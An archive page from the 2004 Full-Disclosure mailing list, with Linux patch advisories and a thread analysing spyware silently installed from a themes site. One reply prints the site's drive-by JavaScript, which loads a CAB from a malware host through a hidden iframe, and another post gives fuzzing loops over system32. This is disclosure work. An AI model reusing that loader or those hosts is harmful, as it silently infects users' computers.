OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

  • application/octet-stream attachment: price.exe
 
[Full-Disclosure] [SECURITY] [DSA 557-1] New rp-pppoe packages fix potential root compromise

debian-security-announcelists.debian.org
Date: Mon Oct 04 2004 - 05:16:41 CDT

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 557-1 securitydebian.org
http://www.debian.org/security/ Martin Schulze
October 4th, 2004 http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package : rp-pppoe, pppoe
Vulnerability : missing privilegue dropping
Problem-Type : local
Debian-specific: no
CVE ID : CAN-2004-0564

Max Vozeler discovered a vulnerability in pppoe, the PPP over Ethernet
driver from Roaring Penguin. When the program is running setuid root
(which is not the case in a default Debian installation), an attacker
could overwrite any file on the file system.

For the stable distribution (woody) this problem has been fixed in
version 3.3-1.2.

For the unstable distribution (sid) this problem has been fixed in
version 3.5-4.

We recommend that you upgrade your pppoe package.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.0 alias woody
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/r/rp-pppoe/rp-pppoe_3.3-1.2.dsc
      Size/MD5 checksum: 571 20a98e281e9effbdbe253d5f1ec7c07b
    http://security.debian.org/pool/updates/main/r/rp-pppoe/rp-pppoe_3.3-1.2.diff.gz
      Size/MD5 checksum: 17171 840c64159a02c63bcd84ad84acbcfbbe
    http://security.debian.org/pool/updates/main/r/rp-pppoe/rp-pppoe_3.3.orig.tar.gz
      Size/MD5 checksum: 171480 1cd6bc22f7601f769bb654db4a15b15d

  Alpha architecture:

    http://security.debian.org/pool/updates/main/r/rp-pppoe/pppoe_3.3-1.2_alpha.deb
      Size/MD5 checksum: 83104 ea1e596bbd07d28d272c723ef627b935

  ARM architecture:

    http://security.debian.org/pool/updates/main/r/rp-pppoe/pppoe_3.3-1.2_arm.deb
      Size/MD5 checksum: 60492 6f90f09bbb0115dd8b5aa08970fc7007

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/r/rp-pppoe/pppoe_3.3-1.2_i386.deb
      Size/MD5 checksum: 54276 765e571caff2562b74bdae9636712d58

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/r/rp-pppoe/pppoe_3.3-1.2_ia64.deb
      Size/MD5 checksum: 90212 c03d1045236ee6aaf0bec77e287b0a50

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/r/rp-pppoe/pppoe_3.3-1.2_hppa.deb
      Size/MD5 checksum: 64064 8669b8c254a243fbb4620e9cf5ac5905

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/r/rp-pppoe/pppoe_3.3-1.2_m68k.deb
      Size/MD5 checksum: 51000 23a16fdf89476bdf62107667d9f71d50

  Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/r/rp-pppoe/pppoe_3.3-1.2_mips.deb
      Size/MD5 checksum: 68078 750310a89f7f34d0e8921efb45999cda

  Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/r/rp-pppoe/pppoe_3.3-1.2_mipsel.deb
      Size/MD5 checksum: 68320 eb2c9ea82226df16363392e78ab04fb1

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/r/rp-pppoe/pppoe_3.3-1.2_powerpc.deb
      Size/MD5 checksum: 56970 dd068ef0338515cc0a846ed1dfdf0dbc

  IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/r/rp-pppoe/pppoe_3.3-1.2_s390.deb
      Size/MD5 checksum: 58376 8b520d4fc7ff356d40e7f7fc1b10b8e3

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/r/rp-pppoe/pppoe_3.3-1.2_sparc.deb
      Size/MD5 checksum: 64326 c5523f8e12ec9bd01a003912df5611a7

  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announcelists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.5 (GNU/Linux)

iD8DBQFBYSMJW5ql+IAeqTIRAtO0AJ92EvDNM/PdhkdErRBGPecw64hhfACdFHEz
Qyws0FhUZmFPQdgRAVW72Rw=
=GgYg
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] [FLSA-2004:1324] Updated libxml2 resolves security vulnerability

From: Marc Deslauriers (marcdeslauriersvideotron.ca)
Date: Mon Oct 04 2004 - 07:00:34 CDT

-----------------------------------------------------------------------
               Fedora Legacy Update Advisory

Synopsis: Updated libxml2 resolves security vulnerability
Advisory ID: FLSA:1324
Issue date: 2004-10-04
Product: Red Hat Linux
Keywords: Security
Cross references: https://bugzilla.fedora.us/show_bug.cgi?id=1324
CVE Names: CAN-2004-0110
-----------------------------------------------------------------------

-----------------------------------------------------------------------
1. Topic:

[Updated 4th October 2004]
The packages contained in the original release of this advisory were
missing python 2.2 support. These updated packages restore the missing
functionality.

Updated libxml2 packages that fix an overflow when parsing remote
resources are now available.

2. Relevant releases/architectures:

Red Hat Linux 7.3 - i386

3. Problem description:

libxml2 is a library for manipulating XML files.

Yuuichi Teranishi discovered a flaw in libxml2 versions prior to 2.6.6.
When fetching a remote resource via FTP or HTTP, libxml2 uses special
parsing routines. These routines can overflow a buffer if passed a very
long URL. If an attacker is able to find an application using libxml2
that parses remote resources and allows them to influence the URL, then
this flaw could be used to execute arbitrary code. The Common
Vulnerabilities and Exposures project (cve.mitre.org) has assigned the
name CAN-2004-0110 to this issue.

All users are advised to upgrade to these updated packages, which
contain a backported fix and are not vulnerable to this issue.

Fedora Legacy would like to thank Johnny Strom for reporting this issue.

4. Solution:

Before applying this update, make sure all previously released errata
relevant to your system have been applied.

To update all RPMs for your particular architecture, run:

rpm -Fvh [filenames]

where [filenames] is a list of the RPMs you wish to upgrade. Only those
RPMs which are currently installed will be updated. Those RPMs which
are not installed but included in the list will not be updated. Note
that you can also use wildcards (*.rpm) if your current directory *only*
contains the desired RPMs.

Please note that this update is also available via yum and apt. Many
people find this an easier way to apply updates. To use yum issue:

yum update

or to use apt:

apt-get update; apt-get upgrade

This will start an interactive process that will result in the
appropriate RPMs being upgraded on your system. This assumes that you
have yum or apt-get configured for obtaining Fedora Legacy content.
Please visit http://www fedoralegacy.org/docs for directions on how to
configure yum and apt-get.

5. Bug IDs fixed:

http://bugzilla.fedora.us - 1324 - libxml2: an overflow when parsing
remote resources.

6. RPMs required:

Red Hat Linux 7.3:

SRPM:
http://download.fedoralegacy.org/redhat/7.3/updates/SRPMS/libxml2-2.4.19-6.legacy.src.rpm

i386:
http://download.fedoralegacy.org/redhat/7.3/updates/i386/libxml2-2.4.19-6.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/libxml2-python-2.4.19-6.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/libxml2-devel-2.4.19-6.legacy.i386.rpm

7. Verification:

SHA1 sum Package Name
---------------------------------------------------------------------------

41e9e0daaf643f9d3ec96cbba7b050a397d1907e
7.3/updates/i386/libxml2-2.4.19-6.legacy.i386.rpm
130e6e03b76891959e58a3ddd56bc99777d76981
7.3/updates/i386/libxml2-devel-2.4.19-6.legacy.i386.rpm
42087ae0d2e5ee16c4ecf32478991d96ce0500cb
7.3/updates/i386/libxml2-python-2.4.19-6.legacy.i386.rpm
8a1d844bfb9494c00bd4a6dd2d95a0829daf9f42
7.3/updates/SRPMS/libxml2-2.4.19-6.legacy.src.rpm

These packages are GPG signed by Fedora Legacy for security. Our key is
available from http://www.fedoralegacy org/about/security.php

You can verify each package with the following command:

    rpm --checksig -v <filename>

If you only wish to verify that each package has not been corrupted or
tampered with, examine only the sha1sum with the following command:

    sha1sum <filename>

8. References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0110
https://www.redhat.com/archives/redhat-watch-list/2004-February/msg00007.html
http://mail.gnome.org/archives/xml/2004-February/msg00070.html

9. Contact:

The Fedora Legacy security contact is <secnoticefedoralegacy.org>. More
project details at http://www.fedoralegacy.org

---------------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQBBYTtiLMAs/0C4zNoRAk51AJ9pgfltdV5l4zEkq5hNY7l8AEIcaQCfYivt
wgnHLaImWy+1BQha3wTjgGg=
=iWs3
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Spyware installs with no interaction in IE on fully patched XP SP2 box

From: Geraldo Rivera (iamafraudhotmail.com)
Date: Mon Oct 04 2004 - 08:47:08 CDT

themexp.org

I should have logged all the files and reg entries I deleted, but it was
late at night and I wasn't really thinking about that at the time. I just
checked my IE history for some of the things I googled and I found a bunch
of them:

SahAgent.exe
webrebates0.exe
lu.dat
preInsln.exe
Systb.dll
wupdater.exe
eakrfu.exe
wupdt.exe
megasearch toolbar (www.megasearchbar.com)
IEPlugin
localnrd.dll
multimpp.dll

>From: "Joel R. Helgeson" <joelhelgeson.com>
>To: "Geraldo Rivera"
><iamafraudhotmail.com>,<full-disclosurelists.netsys.com>
>Subject: Re: [Full-Disclosure] Spyware installs with no interaction in IE
>on fully patched XP SP2 box
>Date: Sun, 3 Oct 2004 14:13:52 -0500
>
>What was the site?
>
>Joel R. Helgeson
>Director of Networking & Security Services
>SymetriQ Corporation
>
>"Give a man fire, and he'll be warm for a day; set a man on fire, and he'll
>be warm for the rest of his life."
>----- Original Message ----- From: "Geraldo Rivera" <iamafraudhotmail.com>
>To: <full-disclosurelists.netsys.com>
>Sent: Sunday, October 03, 2004 1:16 PM
>Subject: [Full-Disclosure] Spyware installs with no interaction in IE on
>fully patched XP SP2 box
>
>
>>Last night I went to a site that I have been to on and off for years. The
>>page loaded and then in IE's status bar I saw something suspicious:
>>"installing components...atpartners.cab". I could not close out of IE, and
>>I could not kill the iexplorer.exe process. It totally locked up and I had
>>to reboot my machine. When my machine came back up, I had at least 6
>>different pieces of spyware/adware on my machine. IT took me almost 2 hrs
>>to clean up. I manually deleted a bunch of crap (stuff I had found through
>>the run key in the registry, suspicious processes running, suspicious
>>files in the usual dir's, and by searching for all files modified at the
>>time this happened). Even after all that, Ad-Aware found 143 entries (none
>>were cookies, mostly registry entries and a few dll's) and then Spybot
>>found an additional 2 registry entries.
>>
>>This machine is a fully patched XP SP2 box, with the default security
>>settings for IE's Internet Zone. Does anybody know what method this crap
>>could be using to install without any user interaction?
>>
>>_________________________________________________________________
>>Express yourself instantly with MSN Messenger! Download today - it's FREE!
>>hthttp://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
>>
>>_______________________________________________
>>Full-Disclosure - We believe in it.
>>Charter: http://lists.netsys.com/full-disclosure-charter.html
>

_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today - it's FREE!
hthttp://messenger.msn.click-url.com/go/onm00200471ave/direct/01/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [Full-Disclosure] Spyware installs with no interaction in IE on fully patched XP SP2 box

From: Carr, Robert (rcarremail.uky.edu)
Date: Mon Oct 04 2004 - 09:23:41 CDT

Interesting...

I just went there, and he's right. Atpartners.cab installed without
permission. My McAfee picked it right up as Atpartners.dll, downloaded
to Temp Internet files. Spyware detected as NetPals. On the other hand,
I'm admin of my machine, I wonder if a "user" would get an error message
about not having the correct rights...

Thanks,
 
Robert

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Geraldo
Rivera
Sent: Monday, October 04, 2004 9:47 AM
To: full-disclosurelists.netsys.com
Subject: Re: [Full-Disclosure] Spyware installs with no interaction in
IE on fully patched XP SP2 box

themexp.org

I should have logged all the files and reg entries I deleted, but it was

late at night and I wasn't really thinking about that at the time. I
just
checked my IE history for some of the things I googled and I found a
bunch
of them:

SahAgent.exe
webrebates0.exe
lu.dat
preInsln.exe
Systb.dll
wupdater.exe
eakrfu.exe
wupdt.exe
megasearch toolbar (www.megasearchbar.com)
IEPlugin
localnrd.dll
multimpp.dll

>From: "Joel R. Helgeson" <joelhelgeson.com>
>To: "Geraldo Rivera"
><iamafraudhotmail.com>,<full-disclosurelists.netsys.com>
>Subject: Re: [Full-Disclosure] Spyware installs with no interaction in
IE
>on fully patched XP SP2 box
>Date: Sun, 3 Oct 2004 14:13:52 -0500
>
>What was the site?
>
>Joel R. Helgeson
>Director of Networking & Security Services
>SymetriQ Corporation
>
>"Give a man fire, and he'll be warm for a day; set a man on fire, and
he'll
>be warm for the rest of his life."
>----- Original Message ----- From: "Geraldo Rivera"
<iamafraudhotmail.com>
>To: <full-disclosurelists.netsys.com>
>Sent: Sunday, October 03, 2004 1:16 PM
>Subject: [Full-Disclosure] Spyware installs with no interaction in IE
on
>fully patched XP SP2 box
>
>
>>Last night I went to a site that I have been to on and off for years.
The
>>page loaded and then in IE's status bar I saw something suspicious:
>>"installing components...atpartners.cab". I could not close out of IE,
and
>>I could not kill the iexplorer.exe process. It totally locked up and I
had
>>to reboot my machine. When my machine came back up, I had at least 6
>>different pieces of spyware/adware on my machine. IT took me almost 2
hrs
>>to clean up. I manually deleted a bunch of crap (stuff I had found
through
>>the run key in the registry, suspicious processes running, suspicious
>>files in the usual dir's, and by searching for all files modified at
the
>>time this happened). Even after all that, Ad-Aware found 143 entries
(none
>>were cookies, mostly registry entries and a few dll's) and then Spybot

>>found an additional 2 registry entries.
>>
>>This machine is a fully patched XP SP2 box, with the default security
>>settings for IE's Internet Zone. Does anybody know what method this
crap
>>could be using to install without any user interaction?
>>
>>_________________________________________________________________
>>Express yourself instantly with MSN Messenger! Download today - it's
FREE!
>>hthttp://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
>>
>>_______________________________________________
>>Full-Disclosure - We believe in it.
>>Charter: http://lists.netsys.com/full-disclosure-charter.html
>

_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today - it's
FREE!
hthttp://messenger.msn.click-url.com/go/onm00200471ave/direct/01/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Spyware installs with no interaction in IE on fully patched XP SP2 box

From: Matt Andreko (mandrekoori.net)
Date: Mon Oct 04 2004 - 09:26:35 CDT

I was unable to verify it, since I don't use IE, and would prefer not
infecting myself on accident, however I did run across this:

http://themexp.org/about_wrap.php

Perhaps one of the themes you downloaded was bundled with the spyware?

Geraldo Rivera wrote:
> themexp.org
>
> I should have logged all the files and reg entries I deleted, but it was
> late at night and I wasn't really thinking about that at the time. I
> just checked my IE history for some of the things I googled and I found
> a bunch of them:
>
> SahAgent.exe
> webrebates0.exe
> lu.dat
> preInsln.exe
> Systb.dll
> wupdater.exe
> eakrfu.exe
> wupdt.exe
> megasearch toolbar (www.megasearchbar.com)
> IEPlugin
> localnrd.dll
> multimpp.dll
>
>> From: "Joel R. Helgeson" <joelhelgeson.com>
>> To: "Geraldo Rivera"
>> <iamafraudhotmail.com>,<full-disclosurelists.netsys.com>
>> Subject: Re: [Full-Disclosure] Spyware installs with no interaction in
>> IE on fully patched XP SP2 box
>> Date: Sun, 3 Oct 2004 14:13:52 -0500
>>
>> What was the site?
>>
>> Joel R. Helgeson
>> Director of Networking & Security Services
>> SymetriQ Corporation
>>
>> "Give a man fire, and he'll be warm for a day; set a man on fire, and
>> he'll be warm for the rest of his life."
>> ----- Original Message ----- From: "Geraldo Rivera"
>> <iamafraudhotmail.com>
>> To: <full-disclosurelists.netsys.com>
>> Sent: Sunday, October 03, 2004 1:16 PM
>> Subject: [Full-Disclosure] Spyware installs with no interaction in IE
>> on fully patched XP SP2 box
>>
>>
>>> Last night I went to a site that I have been to on and off for years.
>>> The page loaded and then in IE's status bar I saw something
>>> suspicious: "installing components...atpartners.cab". I could not
>>> close out of IE, and I could not kill the iexplorer.exe process. It
>>> totally locked up and I had to reboot my machine. When my machine
>>> came back up, I had at least 6 different pieces of spyware/adware on
>>> my machine. IT took me almost 2 hrs to clean up. I manually deleted a
>>> bunch of crap (stuff I had found through the run key in the registry,
>>> suspicious processes running, suspicious files in the usual dir's,
>>> and by searching for all files modified at the time this happened).
>>> Even after all that, Ad-Aware found 143 entries (none were cookies,
>>> mostly registry entries and a few dll's) and then Spybot found an
>>> additional 2 registry entries.
>>>
>>> This machine is a fully patched XP SP2 box, with the default security
>>> settings for IE's Internet Zone. Does anybody know what method this
>>> crap could be using to install without any user interaction?
>>>
>>> _________________________________________________________________
>>> Express yourself instantly with MSN Messenger! Download today - it's
>>> FREE! hthttp://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
>>>
>>> _______________________________________________
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.netsys.com/full-disclosure-charter.html
>>
>>
>
> _________________________________________________________________
> Express yourself instantly with MSN Messenger! Download today - it's
> FREE! hthttp://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [Full-Disclosure] Spyware installs with no interaction in IE on fully patched XP SP2 box

From: Todd Towles (toddtowlesbrookshires.com)
Date: Mon Oct 04 2004 - 09:47:44 CDT

Aren't their still cross-scripting problems with IE still? Plus I think
the Drag and Drop exploit is still unpatched? Comments anyone?

> -----Original Message-----
> From: full-disclosure-adminlists.netsys.com
> [mailto:full-disclosure-adminlists.netsys.com] On Behalf Of
> Harlan Carvey
> Sent: Sunday, October 03, 2004 2:37 PM
> To: full-disclosurelists.netsys.com
> Cc: Joel R. Helgeson; Geraldo Rivera
> Subject: Re: [Full-Disclosure] Spyware installs with no
> interaction in IE on fully patched XP SP2 box
>
>
> > > This machine is a fully patched XP SP2 box, with
> > the default security
> > > settings for IE's Internet Zone. Does anybody know
> > what method this crap
> > > could be using to install without any user
> > interaction?
>
> It's a little hard to tell accurately without taking a look
> at what you removed; ie, saying that you cleaned things out
> of the Registry is great, but without knowing what keys you
> "cleaned", it's hard to tell.
>
> However, doing a quick search on Google for "atpartners",
> some of the info I found points to BHOs...
>
> Sorry, wish I could help more, but I'd need more info...
>
> =====
> ------------------------------------------
> Harlan Carvey, CISSP
> "Windows Forensics and Incident Recovery"
> http://www.windows-ir.com
> http://groups.yahoo.com/group/windowsir/
>
> "Meddle not in the affairs of dragons, for you are crunchy,
> and good with ketchup."
>
> "The simplicity of this game amuses me.
> Bring me your finest meats and cheeses."
> ------------------------------------------
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Re: Spyware installs with no interaction in IE on fully patched XP SP2 box

From: Willem Koenings (iseceurope.com)
Date: Mon Oct 04 2004 - 09:55:19 CDT

hi,

> I was unable to verify it, since I don't use IE, and would prefer not
> infecting myself on accident, however I did run across this:
>
> http://themexp.org/about_wrap.php
>
> Perhaps one of the themes you downloaded was bundled with the spyware?

two tiny links from there:

http://WWW.addictivetechnologies.net/dm0/js/Confirm80wu03rd.js
http://www.addictivetechnologies.net/DM0/cab/ATPartners.cab

W.

--
___________________________________________________________
Sign-up for Ads Free at Mail.com
http://promo.mail.com/adsfreejump.htm

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [Full-Disclosure] Spyware installs with no interaction in IE on fully patched XP SP2 box

From: Todd Towles (toddtowlesbrookshires.com)
Date: Mon Oct 04 2004 - 09:51:04 CDT

Yep Themexp.org was my wallpaper stop for a while. But it was taken over
by new owners a whlie ago about and it is turning south, into a
adware/spyware/pop-up site. Kinda sad, it was a very good site.

> -----Original Message-----
> From: full-disclosure-adminlists.netsys.com
> [mailto:full-disclosure-adminlists.netsys.com] On Behalf Of
> Geraldo Rivera
> Sent: Monday, October 04, 2004 8:47 AM
> To: full-disclosurelists.netsys.com
> Subject: Re: [Full-Disclosure] Spyware installs with no
> interaction in IE on fully patched XP SP2 box
>
> themexp.org
>
> I should have logged all the files and reg entries I deleted,
> but it was late at night and I wasn't really thinking about
> that at the time. I just checked my IE history for some of
> the things I googled and I found a bunch of them:
>
> SahAgent.exe
> webrebates0.exe
> lu.dat
> preInsln.exe
> Systb.dll
> wupdater.exe
> eakrfu.exe
> wupdt.exe
> megasearch toolbar (www.megasearchbar.com) IEPlugin
> localnrd.dll multimpp.dll
>
> >From: "Joel R. Helgeson" <joelhelgeson.com>
> >To: "Geraldo Rivera"
> ><iamafraudhotmail.com>,<full-disclosurelists.netsys.com>
> >Subject: Re: [Full-Disclosure] Spyware installs with no
> interaction in
> >IE on fully patched XP SP2 box
> >Date: Sun, 3 Oct 2004 14:13:52 -0500
> >
> >What was the site?
> >
> >Joel R. Helgeson
> >Director of Networking & Security Services SymetriQ Corporation
> >
> >"Give a man fire, and he'll be warm for a day; set a man on
> fire, and
> >he'll be warm for the rest of his life."
> >----- Original Message ----- From: "Geraldo Rivera"
> ><iamafraudhotmail.com>
> >To: <full-disclosurelists.netsys.com>
> >Sent: Sunday, October 03, 2004 1:16 PM
> >Subject: [Full-Disclosure] Spyware installs with no
> interaction in IE
> >on fully patched XP SP2 box
> >
> >
> >>Last night I went to a site that I have been to on and off
> for years.
> >>The page loaded and then in IE's status bar I saw something
> suspicious:
> >>"installing components...atpartners.cab". I could not close
> out of IE,
> >>and I could not kill the iexplorer.exe process. It totally
> locked up
> >>and I had to reboot my machine. When my machine came back
> up, I had at
> >>least 6 different pieces of spyware/adware on my machine.
> IT took me
> >>almost 2 hrs to clean up. I manually deleted a bunch of
> crap (stuff I
> >>had found through the run key in the registry, suspicious processes
> >>running, suspicious files in the usual dir's, and by
> searching for all
> >>files modified at the time this happened). Even after all that,
> >>Ad-Aware found 143 entries (none were cookies, mostly
> registry entries
> >>and a few dll's) and then Spybot found an additional 2
> registry entries.
> >>
> >>This machine is a fully patched XP SP2 box, with the
> default security
> >>settings for IE's Internet Zone. Does anybody know what method this
> >>crap could be using to install without any user interaction?
> >>
> >>_________________________________________________________________
> >>Express yourself instantly with MSN Messenger! Download
> today - it's FREE!
> >>hthttp://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
> >>
> >>_______________________________________________
> >>Full-Disclosure - We believe in it.
> >>Charter: http://lists.netsys.com/full-disclosure-charter.html
> >
>
> _________________________________________________________________
> Express yourself instantly with MSN Messenger! Download today
> - it's FREE!
> hthttp://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Test your windows OS

From: Berend-Jan Wever (skylinededup.tudelft.nl)
Date: Mon Oct 04 2004 - 10:39:06 CDT

Hi all,

Wanna do a quick test to see if the programmers that wrote your windows operating system have any clue as to what there doing ? Run these commands from cmd.exe in the system32 directory:

for %i in (*.exe) do start %i %n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n
for %i in (*.exe) do start %i AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.... (type as much "A"-s as cmd.exe allows on one line.)

Each command will execute every program in your system32 directory, most of them will either ignore the parameter or report an error because the parameter doesn't make sence... But on my win2k system I found 6 programs vulnerable to these very simple formatsting and BoF tests.... grpconv even gives EIP 0x00410041, can it be any easier?

These are not vulnerabilities in itself: you cannot gain access or elevate priviledges but I just wanted to let you know that these programmers did a sloppy job.

Cheers,
SkyLined

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Spyware installs with no interaction in IE on fully patched XP SP2 box

From: Mark Shirley (mshirleygmail.com)
Date: Mon Oct 04 2004 - 10:21:49 CDT

var exepath='http://www.addictivetechnologies.net/DM0/cab/ATPartners.cab';
var retry_enabled = true;
var retry_cnt=1;

executeScript(getCookie('minpopup80wu03rd'));

function executeScript(CookieExists) {

        //Check if cookie exists, if it does we know the user has visited the
site within the last 24 hrs so don't load the script
        if (CookieExists!=null) {

                //If cookie does exists then exit
                
                return null;

                }
        else {

                //If cookie does not exist then we can assume the user has not been
to the site within the last 24 hrs
                document.write('<iframe id="downloads_manager"
style="position:absolute;visibility:hidden;"></iframe>');
                
              document_code = '<html><head>\n';
              document_code += '<\/head><body>\n';
              document_code += '<object
onerror="window.parent.retry();" id="DDownload_UL1"
classid="clsid:00000EF1-0786-4633-87C6-1AA7A44296DA"
codebase="http://www.addictivetechnologies.net/DM0/cab/ATPartners.cab"
HEIGHT=0 WIDTH=0><PARAM NAME="AffiliateID"
VALUE="%2BA0%2CJ%7Dh%3AB6%5E%3B9gy%3E7ue%2D%7Dhx"></object>\n';
              document_code += '<\/body><\/html>';
              downloads_manager.document.write(document_code);
              downloads_manager.document.close();

                setCookie('minpopup80wu03rd','test',1);

                }
        }

function retry()
{
        //if(retry_cnt>0)
        //{
                //setCookie('minpopup80wu03rd','test',0);
                //alert("To install latest At-Games Games update, please click Yes");
                //document_code = '<html><head>\n';
                //document_code += '<\/head><body>\n';
                //document_code += '<object id="DDownload_UL1"
classid="clsid:00000EF1-0786-4633-87C6-1AA7A44296DA"
codebase="http://www.addictivetechnologies.net/DM0/cab/ATPartners.cab"
HEIGHT=0 WIDTH=0></object>\n';
                //document_code += '<\/body><\/html>';
                //downloads_manager.document.write(document_code);
                //downloads_manager.document.close();
                //setCookie('minpopup80wu03rd','test',1);
                //retry_cnt--;
        //} else {
                        //alert("This is a 1 time install, once you click Open it will
never pop up this message again");
                        //window.location =
"http://www.NetpalOffers.net/NetpalOffers/DMOXe/80wu03rd.exe";
        //}
}

function getCookie(NameOfCookie) {

if (document.cookie.length > 0) {

        begin = document.cookie.indexOf(NameOfCookie+"=");
        if (begin != -1) {

        begin += NameOfCookie.length+1;
        end = document.cookie.indexOf(";", begin);

        if (end == -1) end = document.cookie.length;
                return unescape(document.cookie.substring(begin, end)); }
        }
        return null;

}

function setCookie(NameOfCookie, value, expiredays) {

var ExpireDate = new Date ();
ExpireDate.setTime(ExpireDate.getTime() + (expiredays * 24 * 3600 * 1000));

document.cookie = NameOfCookie + "=" + escape(value) +
((expiredays == null) ? "" : "; expires=" + ExpireDate.toGMTString());
}

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [Full-Disclosure] Spyware installs with no interaction in IE on fully patched XP SP2 box

From: Michael Simpson (Michael.Simpsoninveresk.com)
Date: Mon Oct 04 2004 - 09:56:49 CDT

nope, there is no error message when accessing this site as a user - just
a very quick flash of a pop-up going to wepdt(?).gator.something.
  There doesn't appear to be any trace on this computer of any of the
files mentioned previously so i guess that you may need to be running as
admin to get the download.

cheers,

mikie

"Carr, Robert" <rcarremail.uky.edu>
Sent by: full-disclosure-adminlists.netsys.com
04/10/2004 15:23

To
<full-disclosurelists.netsys.com>
cc

Subject
RE: [Full-Disclosure] Spyware installs with no interaction in IE on fully
patched XP SP2 box

Interesting...

I just went there, and he's right. Atpartners.cab installed without
permission. My McAfee picked it right up as Atpartners.dll, downloaded
to Temp Internet files. Spyware detected as NetPals. On the other hand,
I'm admin of my machine, I wonder if a "user" would get an error message
about not having the correct rights...

Thanks,
 
Robert

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Geraldo
Rivera
Sent: Monday, October 04, 2004 9:47 AM
To: full-disclosurelists.netsys.com
Subject: Re: [Full-Disclosure] Spyware installs with no interaction in
IE on fully patched XP SP2 box

themexp.org

I should have logged all the files and reg entries I deleted, but it was

late at night and I wasn't really thinking about that at the time. I
just
checked my IE history for some of the things I googled and I found a
bunch
of them:

SahAgent.exe
webrebates0.exe
lu.dat
preInsln.exe
Systb.dll
wupdater.exe
eakrfu.exe
wupdt.exe
megasearch toolbar (www.megasearchbar.com)
IEPlugin
localnrd.dll
multimpp.dll

>From: "Joel R. Helgeson" <joelhelgeson.com>
>To: "Geraldo Rivera"
><iamafraudhotmail.com>,<full-disclosurelists.netsys.com>
>Subject: Re: [Full-Disclosure] Spyware installs with no interaction in
IE
>on fully patched XP SP2 box
>Date: Sun, 3 Oct 2004 14:13:52 -0500
>
>What was the site?
>
>Joel R. Helgeson
>Director of Networking & Security Services
>SymetriQ Corporation
>
>"Give a man fire, and he'll be warm for a day; set a man on fire, and
he'll
>be warm for the rest of his life."
>----- Original Message ----- From: "Geraldo Rivera"
<iamafraudhotmail.com>
>To: <full-disclosurelists.netsys.com>
>Sent: Sunday, October 03, 2004 1:16 PM
>Subject: [Full-Disclosure] Spyware installs with no interaction in IE
on
>fully patched XP SP2 box
>
